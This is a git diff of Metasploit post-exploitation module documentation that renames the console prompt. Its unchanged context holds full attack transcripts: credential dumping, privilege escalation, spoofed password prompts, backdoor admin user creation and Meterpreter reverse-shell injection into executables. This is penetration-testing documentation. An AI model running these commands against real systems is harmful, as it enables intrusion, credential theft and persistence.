``` - msf5 > use post/multi/recon/sudo_commands - msf5 post(multi/recon/sudo_commands) > set session 1 + msf > use post/multi/recon/sudo_commands + msf post(multi/recon/sudo_commands) > set session 1 session => 1 - msf5 post(multi/recon/sudo_commands) > set verbose true + msf post(multi/recon/sudo_commands) > set verbose true verbose => true - msf5 post(multi/recon/sudo_commands) > run + msf post(multi/recon/sudo_commands) > run [*] Executing: /usr/bin/sudo -n -l Matching Defaults entries for wvu on localhost: 
@@ -78,7 +78,7 @@ [+] Output stored in: /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt [*] Post module execution completed - msf5 post(multi/recon/sudo_commands) > cat /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt + msf post(multi/recon/sudo_commands) > cat /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt [*] exec: cat /Users/user/.msf4/loot/20180613134731_default_192.168.56.101_sudo.commands_305964.txt Command,RunAsUsers,RunAsGroups,Password?,Privesc? @@ -87,6 +87,6 @@ "/sbin/umount /mnt/cdrom","root","","True","" "ALL","ALL","","True","True" "ALL","ALL","","","True" - msf5 post(multi/recon/sudo_commands) > + msf post(multi/recon/sudo_commands) > ``` diff --git a/documentation/modules/post/networking/gather/enum_brocade.md b/documentation/modules/post/networking/gather/enum_brocade.md index 103c8945cb..c0bf7d1387 100644 --- a/documentation/modules/post/networking/gather/enum_brocade.md +++ b/documentation/modules/post/networking/gather/enum_brocade.md @@ -74,7 +74,7 @@ resource (brocade.rb)> run [+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro [+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw [*] Post module execution completed -msf5 post(networking/gather/enum_brocade) > loot +msf post(networking/gather/enum_brocade) > loot Loot ==== @@ -84,7 +84,7 @@ host service type name content info 10.0.4.51 brocade.version version.txt text/plain Brocade Version /root/.msf4/loot/20190601221959_default_10.0.4.51_brocade.version_003751.txt 10.0.4.51 brocade.config config.txt text/plain Brocade Configuration /root/.msf4/loot/20190601222004_default_10.0.4.51_brocade.config_998514.txt -msf5 post(networking/gather/enum_brocade) > creds +msf post(networking/gather/enum_brocade) > creds Credentials =========== 
diff --git a/documentation/modules/post/networking/gather/enum_cisco.md b/documentation/modules/post/networking/gather/enum_cisco.md index cb743b7946..1a3d0c7c1c 100644 --- a/documentation/modules/post/networking/gather/enum_cisco.md +++ b/documentation/modules/post/networking/gather/enum_cisco.md @@ -84,7 +84,7 @@ resource (cisco.rb)> run [+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt [*] Post module execution completed [*] Starting persistent handler(s)... -msf5 post(networking/gather/enum_cisco) > creds +msf post(networking/gather/enum_cisco) > creds Credentials =========== @@ -153,7 +153,7 @@ resource (cisco.rb)> run [+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt [*] Post module execution completed [*] Starting persistent handler(s)... -msf5 post(networking/gather/enum_cisco) > creds +msf post(networking/gather/enum_cisco) > creds Credentials =========== diff --git a/documentation/modules/post/networking/gather/enum_juniper.md b/documentation/modules/post/networking/gather/enum_juniper.md index c13f9a3aad..a7f4552b25 100644 --- a/documentation/modules/post/networking/gather/enum_juniper.md +++ b/documentation/modules/post/networking/gather/enum_juniper.md 
@@ -41,14 +41,14 @@ This module will look for the following parameters which contain credentials: #### root Login (SSH Shell) ``` -msf5 > auxiliary/scanner/ssh/ssh_login -msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 +msf > auxiliary/scanner/ssh/ssh_login +msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 rhosts => 192.168.1.5 -msf5 auxiliary(scanner/ssh/ssh_login) > set username root +msf auxiliary(scanner/ssh/ssh_login) > set username root username => root -msf5 auxiliary(scanner/ssh/ssh_login) > set password Juniper +msf auxiliary(scanner/ssh/ssh_login) > set password Juniper password => Juniper -msf5 auxiliary(scanner/ssh/ssh_login) > run +msf auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.5:22 - Success: 'root:Juniper' 'Hostname: h00dieJuniperEx2200, Model: ex2200-48t-4g, JUNOS Base OS boot [12.3R7.7]' [*] Command shell session 1 opened (192.168.1.6:45623 -> 192.168.1.5:22) at 2020-07-14 20:48:58 -0400 @@ -57,10 +57,10 @@ msf5 auxiliary(scanner/ssh/ssh_login) > run ``` ``` -msf5 auxiliary(scanner/ssh/ssh_login) > use post/networking/gather/enum_juniper -msf5 post(networking/gather/enum_juniper) > set session 1 +msf auxiliary(scanner/ssh/ssh_login) > use post/networking/gather/enum_juniper +msf post(networking/gather/enum_juniper) > set session 1 session => 1 -msf5 post(networking/gather/enum_juniper) > run +msf post(networking/gather/enum_juniper) > run [*] In an SSH shell [*] Getting version information [*] Original OS Guess junos, is now JunOS 12.3R7.7 @@ -81,7 +81,7 @@ msf5 post(networking/gather/enum_juniper) > run [+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV [+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP [*] Post module execution completed -msf5 post(networking/gather/enum_juniper) > creds +msf post(networking/gather/enum_juniper) > creds Credentials =========== 
@@ -105,14 +105,14 @@ host origin service public private #### cli Login ``` -msf5 > auxiliary/scanner/ssh/ssh_login -msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 +msf > auxiliary/scanner/ssh/ssh_login +msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.5 rhosts => 192.168.1.5 -msf5 auxiliary(scanner/ssh/ssh_login) > set username newuser +msf auxiliary(scanner/ssh/ssh_login) > set username newuser username => newuser -msf5 auxiliary(scanner/ssh/ssh_login) > set password Newuser +msf auxiliary(scanner/ssh/ssh_login) > set password Newuser password => Newuser -msf5 auxiliary(scanner/ssh/ssh_login) > run +msf auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.1.5:22 - Success: 'newuser:Newuser' 'Hostname: h00dieJuniperEx2200, Model: ex2200-48t-4g, JUNOS Base OS boot [12.3R7.7]' [*] Command shell session 2 opened (192.168.1.6:45623 -> 192.168.1.5:22) at 2018-02-19 21:32:20 -0500 diff --git a/documentation/modules/post/osx/admin/say.md b/documentation/modules/post/osx/admin/say.md index 7331fa08db..2fe314f76c 100644 --- a/documentation/modules/post/osx/admin/say.md +++ b/documentation/modules/post/osx/admin/say.md @@ -77,9 +77,9 @@ Zuzana cs_CZ # Dobrý den, jmenuji se Zuzana. Jsem český hlas. ### User level shell on OSX 10.14.4 ``` -msf5 auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say -msf5 post(osx/admin/say) > set session 1 +msf auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say +msf post(osx/admin/say) > set session 1 session => 1 -msf5 post(osx/admin/say) > run +msf post(osx/admin/say) > run [*] Post module execution completed ``` diff --git a/documentation/modules/post/osx/capture/screen.md b/documentation/modules/post/osx/capture/screen.md index 403ac69dde..38b18da730 100644 --- a/documentation/modules/post/osx/capture/screen.md +++ b/documentation/modules/post/osx/capture/screen.md 
@@ -33,16 +33,16 @@ This module takes screenshots of target desktop and automatically downloads them ### User level shell on OSX 10.14.4 ``` -msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen -msf5 post(osx/capture/screen) > set session 1 +msf post(osx/capture/keylog_recorder) > use post/osx/capture/screen +msf post(osx/capture/screen) > set session 1 session => 1 -msf5 post(osx/capture/screen) > run +msf post(osx/capture/screen) > run [*] Capturing 1 screenshots with a delay of 10 seconds [*] Screen Capturing Complete [*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot [*] Post module execution completed -msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot +msf post(osx/capture/screen) > loot -t screen_capture.screenshot Loot ==== diff --git a/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md b/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md index bab610f1c7..786de20a80 100644 --- a/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md +++ b/documentation/modules/post/osx/gather/apfs_encrypted_volume_passwd.md 
@@ -29,13 +29,13 @@ This module uses a vulnerability in macOS High Sierra's `log` command. It uses t Typical run against an OSX session, after creating a new APFS disk using Disk Utility: ``` -msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd -msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1 +msf exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd +msf post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1 SESSION => -1 -msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit +msf post(osx/gather/apfs_encrypted_volume_passwd) > exploit [+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 . [+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 . [*] Post module execution completed -msf5 post(osx/gather/apfs_encrypted_volume_passwd) > +msf post(osx/gather/apfs_encrypted_volume_passwd) > ``` diff --git a/documentation/modules/post/osx/gather/enum_osx.md b/documentation/modules/post/osx/gather/enum_osx.md index 5010f45d32..bb05fa27c2 100644 --- a/documentation/modules/post/osx/gather/enum_osx.md +++ b/documentation/modules/post/osx/gather/enum_osx.md @@ -42,8 +42,8 @@ The following information is enumerated: ### User level shell on OSX 10.14.4 ``` -msf5 > use post/osx/gather/enum_osx -msf5 post(osx/gather/enum_osx) > show options +msf > use post/osx/gather/enum_osx +msf post(osx/gather/enum_osx) > show options Module options (post/osx/gather/enum_osx): @@ -51,9 +51,9 @@ Module options (post/osx/gather/enum_osx): ---- --------------- -------- ----------- SESSION yes The session to run this module on. -msf5 post(osx/gather/enum_osx) > set session 1 +msf post(osx/gather/enum_osx) > set session 1 session => 1 -msf5 post(osx/gather/enum_osx) > run +msf post(osx/gather/enum_osx) > run [*] Running module against MacBook-Pro.nogroup [*] Saving all data to /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 
@@ -85,7 +85,7 @@ msf5 post(osx/gather/enum_osx) > run [*] Downloading .bash_history [*] Enumerating and Downloading keychains for h00die [*] Post module execution completed -msf5 post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 +msf post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 [*] exec: ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738 total 1.4M diff --git a/documentation/modules/post/osx/gather/hashdump.md b/documentation/modules/post/osx/gather/hashdump.md index 79ad868829..13529496e9 100644 --- a/documentation/modules/post/osx/gather/hashdump.md +++ b/documentation/modules/post/osx/gather/hashdump.md @@ -21,7 +21,7 @@ This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10 ### User level shell on OSX 10.14.4 ``` -msf5 post(osx/gather/hashdump) > run +msf post(osx/gather/hashdump) > run [-] Post aborted due to failure: bad-config: Insufficient Privileges: must be running as root to dump the hashes [*] Post module execution completed @@ -30,7 +30,7 @@ msf5 post(osx/gather/hashdump) > run ### Root level shell on OSX 10.14.4 ``` -msf5 post(osx/gather/hashdump) > run +msf post(osx/gather/hashdump) > run [*] Attempting to grab shadow for user nobody... [*] Attempting to grab shadow for user h00die... diff --git a/documentation/modules/post/osx/gather/password_prompt_spoof.md b/documentation/modules/post/osx/gather/password_prompt_spoof.md index 22f78cad6a..b83c035e1b 100644 --- a/documentation/modules/post/osx/gather/password_prompt_spoof.md +++ b/documentation/modules/post/osx/gather/password_prompt_spoof.md 
@@ -33,7 +33,7 @@ allow permission for the prompt to be displayed. See Scenarios for additional d If the user does not complete the prompt in time, or does not enable permissions to receive the prompt: ``` -msf5 post(osx/gather/password_prompt_spoof) > run +msf post(osx/gather/password_prompt_spoof) > run [*] Running module against MacBook-Pro.nogroup [*] Waiting for user 'h00die' to enter credentials... @@ -45,7 +45,7 @@ msf5 post(osx/gather/password_prompt_spoof) > run If the user DOES complete the prompt in time: ``` -msf5 post(osx/gather/password_prompt_spoof) > run +msf post(osx/gather/password_prompt_spoof) > run [*] Running module against MacBook-Pro.nogroup [*] Waiting for user 'h00die' to enter credentials... diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md index 526ad7c521..bdba512ae6 100644 --- a/documentation/modules/post/osx/gather/vnc_password_osx.md +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -23,14 +23,14 @@ System Preferences > Sharing > Screen Sharing > Computer Settings Typical run against an OSX session, with the vnc service activated: ``` -msf5 exploit(multi/handler) > use post/osx/gather/vnc_password_osx -msf5 post(osx/gather/vnc_password_osx) > set SESSION 1 +msf exploit(multi/handler) > use post/osx/gather/vnc_password_osx +msf post(osx/gather/vnc_password_osx) > set SESSION 1 SESSION => 1 -msf5 post(osx/gather/vnc_password_osx) > exploit +msf post(osx/gather/vnc_password_osx) > exploit [*] Checking VNC Password... [+] Password Found: PoCpassw [+] Password data stored as loot in: .msf4/loot/20181002142527_default_10.0.2.15_osx.vnc.password_371610.txt [*] Post module execution completed -msf5 post(osx/gather/vnc_password_osx) > +msf post(osx/gather/vnc_password_osx) > ``` diff --git a/documentation/modules/post/osx/manage/sonic_pi.md b/documentation/modules/post/osx/manage/sonic_pi.md index a920661020..1cfd2714d4 100644 
--- a/documentation/modules/post/osx/manage/sonic_pi.md +++ b/documentation/modules/post/osx/manage/sonic_pi.md @@ -54,7 +54,7 @@ default. ## Usage ``` -msf5 post(osx/manage/sonic_pi) > options +msf post(osx/manage/sonic_pi) > options Module options (post/osx/manage/sonic_pi): @@ -74,7 +74,7 @@ Post action: Run Run Sonic Pi code -msf5 post(osx/manage/sonic_pi) > advanced +msf post(osx/manage/sonic_pi) > advanced Module advanced options (post/osx/manage/sonic_pi): @@ -85,7 +85,7 @@ Module advanced options (post/osx/manage/sonic_pi): VERBOSE true no Enable detailed status messages WORKSPACE no Specify the workspace for this module -msf5 post(osx/manage/sonic_pi) > show actions +msf post(osx/manage/sonic_pi) > show actions Post actions: @@ -95,21 +95,21 @@ Post actions: Stop Stop all jobs -msf5 post(osx/manage/sonic_pi) > set session -1 +msf post(osx/manage/sonic_pi) > set session -1 session => -1 -msf5 post(osx/manage/sonic_pi) > run +msf post(osx/manage/sonic_pi) > run [+] Sonic Pi is running [*] Running Sonic Pi code: /rapid7/metasploit-framework/data/post/sonic_pi_example.rb [*] echo [snip] | base64 -D | /Applications/Sonic\ Pi.app/server/native/ruby/bin/ruby [*] Post module execution completed -msf5 post(osx/manage/sonic_pi) > set action Stop +msf post(osx/manage/sonic_pi) > set action Stop action => Stop -msf5 post(osx/manage/sonic_pi) > run +msf post(osx/manage/sonic_pi) > run [+] Sonic Pi is running [*] Stopping all jobs [*] echo [snip] | base64 -D | /Applications/Sonic\ Pi.app/server/native/ruby/bin/ruby [*] Post module execution completed -msf5 post(osx/manage/sonic_pi) > +msf post(osx/manage/sonic_pi) > ``` diff --git a/documentation/modules/post/solaris/escalate/pfexec.md b/documentation/modules/post/solaris/escalate/pfexec.md index b361623fd4..4e744de50d 100644 --- a/documentation/modules/post/solaris/escalate/pfexec.md +++ b/documentation/modules/post/solaris/escalate/pfexec.md 
@@ -34,26 +34,26 @@ ## Scenarios ``` - msf5 > use post/solaris/escalate/pfexec - msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id + msf > use post/solaris/escalate/pfexec + msf post(solaris/escalate/pfexec) > sessions -i 1 -c id [*] Running 'id' on shell session 1 (172.16.191.221) uid=100(user) gid=10(staff) - msf5 post(solaris/escalate/pfexec) > set verbose true + msf post(solaris/escalate/pfexec) > set verbose true verbose => true - msf5 post(solaris/escalate/pfexec) > set session 1 + msf post(solaris/escalate/pfexec) > set session 1 session => 1 - msf5 post(solaris/escalate/pfexec) > run + msf post(solaris/escalate/pfexec) > run [*] Trying pfexec as `user' ... [*] uid=0(root) gid=0(root) [+] Success! Upgrading session ... [+] Success! root shell secured [*] Post module execution completed - msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id + msf post(solaris/escalate/pfexec) > sessions -i 1 -c id [*] Running 'id' on shell session 1 (172.16.191.221) uid=0(root) gid=0(root) - msf5 post(solaris/escalate/pfexec) > + msf post(solaris/escalate/pfexec) > ``` diff --git a/documentation/modules/post/solaris/escalate/srsexec_readline.md b/documentation/modules/post/solaris/escalate/srsexec_readline.md index c3741db5b0..741ea9034b 100644 --- a/documentation/modules/post/solaris/escalate/srsexec_readline.md +++ b/documentation/modules/post/solaris/escalate/srsexec_readline.md @@ -39,7 +39,7 @@ ### Solaris 10 u9 with mock binary and python 2.4 ``` -msf5 post(solaris/escalate/srsexec_readline) > run +msf post(solaris/escalate/srsexec_readline) > run [+] 3.2.4 is vulnerable [+] Raw Command Output: verify_binary(vFYZf) @@ -53,7 +53,7 @@ see SYSLOG(/var/adm/messages) for errors [+] First line of /etc/shadow: root:MW7h.vpI1Kq1g:17599:::::: [+] Adding root's hash to the credential database. [*] Post module execution completed -msf5 post(solaris/escalate/srsexec_readline) > creds +msf post(solaris/escalate/srsexec_readline) > creds Credentials =========== 
diff --git a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md index ebd3506da8..453149aaec 100644 --- a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md +++ b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md @@ -65,7 +65,7 @@ C:\Users\msfuser\Downloads>exit exit meterpreter > background [*] Backgrounding session 1... -msf5 post(windows/escalate/unmarshal_cmd_exec) > show options +msf post(windows/escalate/unmarshal_cmd_exec) > show options Module options (post/windows/escalate/unmarshal_cmd_exec): @@ -77,11 +77,11 @@ Module options (post/windows/escalate/unmarshal_cmd_exec): SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default). SESSION yes The session to run this module on. -msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt' +msf post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt' command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt -msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true +msf post(windows/escalate/unmarshal_cmd_exec) > set verbose true verbose => true -msf5 post(windows/escalate/unmarshal_cmd_exec) > run +msf post(windows/escalate/unmarshal_cmd_exec) > run [!] SESSION may not be compatible with this module. [*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 @@ -113,7 +113,7 @@ Call: MarshalInterface [*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting... [*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct [*] Post module execution completed -msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1 +msf post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1 [*] Starting interaction with 1... meterpreter > execute -f cmd.exe -i -H 
diff --git a/documentation/modules/post/windows/gather/avast_memory_dump.md b/documentation/modules/post/windows/gather/avast_memory_dump.md index 16387088bb..70e574e28d 100644 --- a/documentation/modules/post/windows/gather/avast_memory_dump.md +++ b/documentation/modules/post/windows/gather/avast_memory_dump.md @@ -32,7 +32,7 @@ Specify the location to write the memory dump to. ### Windows 10 (2004 OS Build 19041.572) ``` -msf5 > search avast +msf > search avast Matching Modules ================ @@ -42,9 +42,9 @@ Matching Modules 0 post/windows/gather/avast_memory_dump normal No Avast AV Memory Dumping Utility -msf5 > use 0 +msf > use 0 -msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe' +msf post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe' [*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131) Filtering on 'notepad.exe' @@ -55,7 +55,7 @@ Process List --- ---- ---- ---- ------- ---- ---- 8504 1812 notepad.exe x64 1 DESKTOP-CD2VHVO\user C:\Windows\System32\notepad.exe -msf5 post(windows/gather/avast_memory_dump) > show options +msf post(windows/gather/avast_memory_dump) > show options Module options (post/windows/gather/avast_memory_dump): @@ -65,13 +65,13 @@ Module options (post/windows/gather/avast_memory_dump): PID 8504 yes specify pid to dump SESSION 4 yes The session to run this module on. -msf5 post(windows/gather/avast_memory_dump) > set PID 8504 +msf post(windows/gather/avast_memory_dump) > set PID 8504 PID => 8504 -msf5 post(windows/gather/avast_memory_dump) > set SESSION 4 +msf post(windows/gather/avast_memory_dump) > set SESSION 4 SESSION => 4 -msf5 post(windows/gather/avast_memory_dump) > run +msf post(windows/gather/avast_memory_dump) > run [*] [2020.10.21-22:49:24] AvDump.exe exists! [*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp 
diff --git a/documentation/modules/post/windows/gather/bloodhound.md b/documentation/modules/post/windows/gather/bloodhound.md index 24503aaeeb..433a181b5c 100644 --- a/documentation/modules/post/windows/gather/bloodhound.md +++ b/documentation/modules/post/windows/gather/bloodhound.md @@ -126,9 +126,9 @@ Logged On Users : 7 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 1... -msf5 post(windows/gather/bloodhound) > set method disk +msf post(windows/gather/bloodhound) > set method disk method => disk -msf5 post(windows/gather/bloodhound) > exploit +msf post(windows/gather/bloodhound) > exploit [*] Uploading sharphound.exe as C:\Users\user\Desktop\qehojlwml.exe [*] Loading BloodHound with: . C:\Users\user\Desktop\qehojlwml.exe --outputdirectory "C:\Users\user\AppData\Local\Temp" --zipfilename eiqxerh --encryptzip --nosavecache @@ -157,7 +157,7 @@ powershell.exe -EncodedCommand LgAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAYQByAGEAXABEAGUAc [*] Deleting C:\Users\user\Desktop\qehojlwml.exe [*] Post module execution completed -msf5 post(windows/gather/bloodhound) > notes +msf post(windows/gather/bloodhound) > notes Notes ===== diff --git a/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md b/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md index 98ab1e49ec..918f4b4362 100644 --- a/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md +++ b/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md @@ -20,7 +20,7 @@ directory of PureVPN. # Demo ``` -msf5 post(windows/gather/credentials/purevpn_cred_collector) > rerun +msf post(windows/gather/credentials/purevpn_cred_collector) > rerun [*] Reloading module... [*] Searching PureVPN Client installation at C:\ProgramData 
diff --git a/documentation/modules/post/windows/gather/phish_windows_credentials.md b/documentation/modules/post/windows/gather/phish_windows_credentials.md index abba7e2e0c..391e6a1a9d 100644 --- a/documentation/modules/post/windows/gather/phish_windows_credentials.md +++ b/documentation/modules/post/windows/gather/phish_windows_credentials.md @@ -39,9 +39,9 @@ msf > use post/windows/gather/phish_windows_credentials msf post(windows/gather/phish_windows_credentials) > set SESSION 1 SESSION => 1 - msf5 post(windows/gather/phish_windows_credentials) > set PROCESS * + msf post(windows/gather/phish_windows_credentials) > set PROCESS * PROCESS => * - msf5 post(windows/gather/phish_windows_credentials) > exploit + msf post(windows/gather/phish_windows_credentials) > exploit [+] PowerShell is installed. [*] Monitoring new processes. diff --git a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md index ba8765e46c..196a2f610d 100644 --- a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md +++ b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md @@ -33,7 +33,7 @@ You'll find details at [Execute assembly via Meterpreter session](https://b4rtik 1. The assembly should run. ``` -msf5 post(windows/manage/execute_dotnet_assembly) > run +msf post(windows/manage/execute_dotnet_assembly) > run [*] Launching notepad.exe to host CLR... [+] Process 10628 launched. @@ -151,4 +151,4 @@ Module options (post/windows/manage/execute_dotnet_assembly): ---- --------------- -------- ----------- KILL true yes Kill the launched process at the end of the task -``` \ No newline at end of file +``` diff --git a/documentation/modules/post/windows/manage/install_python.md b/documentation/modules/post/windows/manage/install_python.md index fb44566e74..0544e54ebf 100644 --- a/documentation/modules/post/windows/manage/install_python.md 
+++ b/documentation/modules/post/windows/manage/install_python.md @@ -47,20 +47,20 @@ This module has been tested against: Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the payload to get a session. - msf5 > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp + msf > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp [*] Payload handler running as background job 0. [*] Started reverse TCP handler on 0.0.0.0:4444 - msf5 > + msf > [*] Sending stage (180291 bytes) to 192.168.13.129 [*] Meterpreter session 1 opened (192.168.13.130:4444 -> 192.168.13.129:50069) at 2020-03-04 20:32:59 -0500 Use the post module to install Python on the target filesystem - msf5 > use post/windows/manage/install_python - msf5 post(windows/manage/install_python) > set SESSION 1 + msf > use post/windows/manage/install_python + msf post(windows/manage/install_python) > set SESSION 1 SESSION => 1 - msf5 post(windows/manage/install_python) > exploit + msf post(windows/manage/install_python) > exploit [*] Downloading Python embeddable zip from https://www.python.org/ftp/python/3.8.2/python-3.8.2-embed-win32.zip [+] Compressed size: 1112 @@ -73,7 +73,7 @@ Use the post module to install Python on the target filesystem Verify Python works - msf5 post(windows/manage/install_python) > sessions -i 1 + msf post(windows/manage/install_python) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell diff --git a/documentation/modules/post/windows/manage/install_ssh.md b/documentation/modules/post/windows/manage/install_ssh.md index 643166342b..43cbecee0c 100644 --- a/documentation/modules/post/windows/manage/install_ssh.md +++ b/documentation/modules/post/windows/manage/install_ssh.md 
@@ -35,10 +35,10 @@ Versions prior to Windows 10 are not supported. ### Install OpenSSH on Windows ``` - msf5 > use post/windows/manage/install_ssh - msf5 post(windows/manage/install_ssh) > set SESSION 1 + msf > use post/windows/manage/install_ssh + msf post(windows/manage/install_ssh) > set SESSION 1 SESSION => 1 - msf5 post(windows/manage/install_ssh) > exploit + msf post(windows/manage/install_ssh) > exploit [*] Installing OpenSSH.Server [*] Installing OpenSSH.Client @@ -51,18 +51,18 @@ When combined with capabilities such as SSH forwarding, SSH on Windows can provi ### Uninstall OpenSSH on Windows ``` - msf5 > use post/windows/manage/install_ssh - msf5 post(windows/manage/install_ssh) > set SESSION 1 + msf > use post/windows/manage/install_ssh + msf post(windows/manage/install_ssh) > set SESSION 1 SESSION => 1 - msf5 post(windows/manage/install_ssh) > set INSTALL_CLIENT false + msf post(windows/manage/install_ssh) > set INSTALL_CLIENT false INSTALL_CLIENT => false - msf5 post(windows/manage/install_ssh) > set INSTALL_SERVER false + msf post(windows/manage/install_ssh) > set INSTALL_SERVER false INSTALL_SERVER => false - msf5 post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true + msf post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true UNINSTALL_CLIENT => true - msf5 post(windows/manage/install_ssh) > set UNINSTALL_SERVER true + msf post(windows/manage/install_ssh) > set UNINSTALL_SERVER true UNINSTALL_SERVER => true - msf5 post(windows/manage/install_ssh) > exploit + msf post(windows/manage/install_ssh) > exploit [*] Uninstalling OpenSSH.Server [*] Uninstalling OpenSSH.Client diff --git a/documentation/modules/post/windows/manage/peinjector.md b/documentation/modules/post/windows/manage/peinjector.md index 7bd7e3ec5e..41521784e7 100644 --- a/documentation/modules/post/windows/manage/peinjector.md +++ b/documentation/modules/post/windows/manage/peinjector.md 
@@ -49,8 +49,8 @@ Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use post/windows/manage/peinjector -msf5 post(windows/manage/peinjector) > show options +msf exploit(multi/handler) > use post/windows/manage/peinjector +msf post(windows/manage/peinjector) > show options Module options (post/windows/manage/peinjector): @@ -63,17 +63,17 @@ Module options (post/windows/manage/peinjector): SESSION yes The session to run this module on. TARGETPE no Path of the target executable to be injected -msf5 post(windows/manage/peinjector) > set lhost 192.168.135.111 +msf post(windows/manage/peinjector) > set lhost 192.168.135.111 lhost => 192.168.135.111 -msf5 post(windows/manage/peinjector) > set lport 4561 +msf post(windows/manage/peinjector) > set lport 4561 lport => 4561 -msf5 post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https +msf post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https -msf5 post(windows/manage/peinjector) > set session 1 +msf post(windows/manage/peinjector) > set session 1 session => 1 -msf5 post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe' +msf post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe' targetpe => C:\users\msfuser\downloads\puttyx64.exe -msf5 post(windows/manage/peinjector) > show options +msf post(windows/manage/peinjector) > show options Module options (post/windows/manage/peinjector): 
